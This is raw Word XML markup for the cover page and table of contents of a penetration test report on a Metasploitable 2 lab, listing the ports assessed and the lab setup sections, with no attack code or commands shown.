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tabs>
          <w:tab w:val="left" w:pos="2692"/>
          <w:tab w:val="left" w:pos="2851"/>
          <w:tab w:val="left" w:pos="8384"/>
        </w:tabs>
        <w:spacing w:before="10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520" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="-6400"/>
        <w:jc w:val="center"/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38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0" w:after="0" w:line="520" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="0"/>
        <w:jc w:val="center"/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386"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="639" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="0"/>
        <w:jc w:val="center"/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386"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="518" w:after="0" w:line="518" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="-20"/>
        <w:jc w:val="center"/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386"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r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30"/>
          <w:noProof/>
        </w:rPr>
        <w:t>RED</w:t>
      </w:r>
      <w:r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29"/>
          <w:noProof/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r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45"/>
          <w:noProof/>
        </w:rPr>
        <w:t>TEAM</w:t>
      </w:r>
      <w:r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52"/>
          <w:szCs w:val="52"/>
          <w:color w:val="#00B4D8"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-39"/>
          <w:noProof/>
        </w:rPr>
        <w:t>ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4618"/>
          <w:tab w:val="left" w:pos="4872"/>
        </w:tabs>
        <w:spacing w:before="152" w:after="0" w:line="279" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="2425"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="-1"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="-1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="3"/>
          <w:noProof/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="-1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="-1"/>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="-1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Penetration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="3"/>
          <w:noProof/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:noProof/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:color w:val="#AABBCC"/>
          <w:i/>
          <w:spacing w:val="-1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="0" w:right="37552000"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#E63946"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-215"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="0" w:right="37552000"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#E63946"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-215"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="0" w:right="37552000"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#E63946"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-215"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="344" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="0" w:right="7760"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#E63946"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-21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5" coordorigin="2439,4950" coordsize="7558,2348" o:spt="12" path="m2439,4950l9997,4950l9997,7298l2439,7298">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 115" type="Shape 115" style="position:absolute;left:0;text-align:left;margin-left:120.97pt;width:379.90pt;height:119.39pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:-251657496" filled="t" fillcolor="#0D1B2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1" coordorigin="2430,4921" coordsize="14,2377" o:spt="12" path="m2437,4921l2437,7298">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 291" type="Shape 291" style="position:absolute;left:0;text-align:left;margin-left:120.49pt;width:2.72pt;height:120.83pt;mso-position-horizontal-relative:page;margin-top:6pt;mso-position-vertical-relative:paragraph;z-index:3822" filled="f" stroked="t" strokeweight="0.72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2" coordorigin="2444,4921" coordsize="7544,29" o:spt="12" path="m2444,4936l9988,4936">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 292" type="Shape 292" style="position:absolute;left:0;text-align:left;margin-left:121.21pt;width:379.18pt;height:3.44pt;mso-position-horizontal-relative:page;margin-top:6pt;mso-position-vertical-relative:paragraph;z-index:3824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3" coordorigin="9988,4921" coordsize="14,2405" o:spt="12" path="m9995,4921l9995,7327">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 293" type="Shape 293" style="position:absolute;left:0;text-align:left;margin-left:498.39pt;width:2.72pt;height:122.27pt;mso-position-horizontal-relative:page;margin-top:6pt;mso-position-vertical-relative:paragraph;z-index:3826" filled="f" stroked="t" strokeweight="0.72pt" strokecolor="#00B4D8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3740"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#E63946"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-215"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#D0D7E3"/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Classification:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#D0D7E3"/>
          <w:spacing w:val="-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E63946"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-18"/>
          <w:noProof/>
        </w:rPr>
        <w:t>CONFIDENTIAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="47" w:after="0" w:line="330" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="2968" w:right="2648"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#FFFFFF"/>
          <w:spacing w:val="-3"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#D0D7E3"/>
          <w:spacing w:val="1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#D0D7E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D0D7E3"/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#D0D7E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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Red</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#FFFFFF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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#FFFFFF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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#FFFFFF"/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Penetration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#FFFFFF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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#D0D7E3"/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#D0D7E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D0D7E3"/>
          <w:spacing w:val="-1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Environment:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#D0D7E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-1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FFFFFF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1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FFFFFF"/>
          <w:spacing w:val="-1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>(Isolated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#FFFFFF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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Lab) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#D0D7E3"/>
          <w:spacing w:val="2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#D0D7E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D0D7E3"/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Platform:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#D0D7E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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#FFFFFF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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#FFFFFF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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="0" w:right="3080"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#FFFFFF"/>
          <w:spacing w:val="-3"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#D0D7E3"/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Methodology:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#D0D7E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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>PTES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#FFFFFF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-2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#FFFFFF"/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#FFFFFF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-1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#FFFFFF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spacing w:val="-1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="0"/>
        <w:jc w:val="center"/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35"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="-1780"/>
        <w:jc w:val="center"/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3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4" coordorigin="2430,7298" coordsize="7558,29" o:spt="12" path="m2430,7312l9988,7312">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 294" type="Shape 294" style="position:absolute;left:0;text-align:left;margin-left:120.49pt;width:379.90pt;height:3.44pt;mso-position-horizontal-relative:page;margin-top:5pt;mso-position-vertical-relative:paragraph;z-index:3830" filled="f" stroked="t" strokeweight="1.44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0"/>
        <w:jc w:val="center"/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35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35"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="268" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="0"/>
        <w:jc w:val="center"/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35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35"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Ports</w:t>
      </w:r>
      <w:r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4"/>
          <w:szCs w:val="24"/>
          <w:color w:val="#00B4D8"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-17"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Assessed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="345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92"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="322" w:after="0" w:line="322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92"/>
          <w:noProof/>
        </w:rPr>
      </w:pP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9"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Table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8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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t>of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8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4"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Contents</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape id="Table 1" o:spid="_x0000_t202" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63pt;width:499pt;height:26pt;z-index:-251657413;mso-position-horizontal-relative:page;margin-top:-12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4"/>
                    <w:tblBorders>
                      <w:top w:val="single" w:sz="6" w:space="0" w:color="00B4D8"/>
                      <w:left w:val="single" w:sz="6" w:space="0" w:color="00B4D8"/>
                      <w:bottom w:val="single" w:sz="6" w:space="0" w:color="00B4D8"/>
                      <w:right w:val="single" w:sz="6" w:space="0" w:color="00B4D8"/>
                      <w:insideH w:val="single" w:sz="6" w:space="0" w:color="00B4D8"/>
                      <w:insideV w:val="single" w:sz="6" w:space="0" w:color="00B4D8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5"/>
                    <w:gridCol w:w="1426"/>
                    <w:gridCol w:w="1618"/>
                    <w:gridCol w:w="1642"/>
                    <w:gridCol w:w="1652"/>
                    <w:gridCol w:w="2151"/>
                  </w:tblGrid>
                  <w:tr>
                    <w:trPr>
                      <w:trHeight w:val="458" w:hRule="atLeast"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
                        <w:vAlign w:val="center"/>
                        <w:tcW w:w="1465" w:type="dxa"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="0" w:line="202" w:lineRule="exact"/>
                          <w:ind w:firstLine="1" w:left="0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0"/>
                            <w:noProof/>
                          </w:rPr>
                          <w:t>21/FTP</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
                        <w:vAlign w:val="center"/>
                        <w:tcW w:w="1426" w:type="dxa"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="0" w:line="202" w:lineRule="exact"/>
                          <w:ind w:firstLine="1" w:left="0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0"/>
                            <w:noProof/>
                          </w:rPr>
                          <w:t>22/SSH</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcBorders>
                          <w:right w:val="single" w:sz="6" w:space="0" w:color="00B4D8"/>
                        </w:tcBorders>
                        <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
                        <w:vAlign w:val="center"/>
                        <w:tcW w:w="1618" w:type="dxa"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="0" w:line="202" w:lineRule="exact"/>
                          <w:ind w:firstLine="1" w:left="0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0"/>
                            <w:noProof/>
                          </w:rPr>
                          <w:t>23/Telnet</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcBorders>
                          <w:left w:val="single" w:sz="6" w:space="0" w:color="00B4D8"/>
                        </w:tcBorders>
                        <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
                        <w:vAlign w:val="center"/>
                        <w:tcW w:w="1642" w:type="dxa"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="0" w:line="202" w:lineRule="exact"/>
                          <w:ind w:firstLine="1" w:left="0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0"/>
                            <w:noProof/>
                          </w:rPr>
                          <w:t>80/HTTP</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
                        <w:vAlign w:val="center"/>
                        <w:tcW w:w="1652" w:type="dxa"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="0" w:line="202" w:lineRule="exact"/>
                          <w:ind w:firstLine="1" w:left="0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0"/>
                            <w:noProof/>
                          </w:rPr>
                          <w:t>445/SMB</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
                        <w:vAlign w:val="center"/>
                        <w:tcW w:w="2151" w:type="dxa"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="0" w:line="202" w:lineRule="exact"/>
                          <w:ind w:firstLine="1" w:left="-20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#00B4D8"/>
                            <w:b/>
                            <w:bCs/>
                            <w:spacing w:val="0"/>
                            <w:noProof/>
                          </w:rPr>
                          <w:t>3306/MySQL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tabs>
          <w:tab w:val="left" w:pos="1143"/>
          <w:tab w:val="left" w:pos="3241"/>
        </w:tabs>
        <w:spacing w:before="147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Table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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>of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Contents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37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2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
          <w:tab w:val="left" w:pos="3962"/>
        </w:tabs>
        <w:spacing w:before="121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1.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Executive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Summary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25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4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="6" w:after="0" w:line="350" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="5935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2.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Lab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Setup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3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Network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Topology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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:eastAsia="Wingdings"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="41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2.1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Network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Architecture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2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5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="6" w:after="0" w:line="350" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="5935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2.2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Virtual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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Machine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Configuration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4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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:eastAsia="Wingdings"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="40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2.2.1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Kali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Linux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(Attacker)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12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5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="5214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2.2.2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Metasploitable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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2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(Bridge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/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Pivot)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6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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:eastAsia="Wingdings"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="40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2.2.3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Windows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10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(Internal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Target)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34"/>
          <w:noProof/>
        </w:rPr>
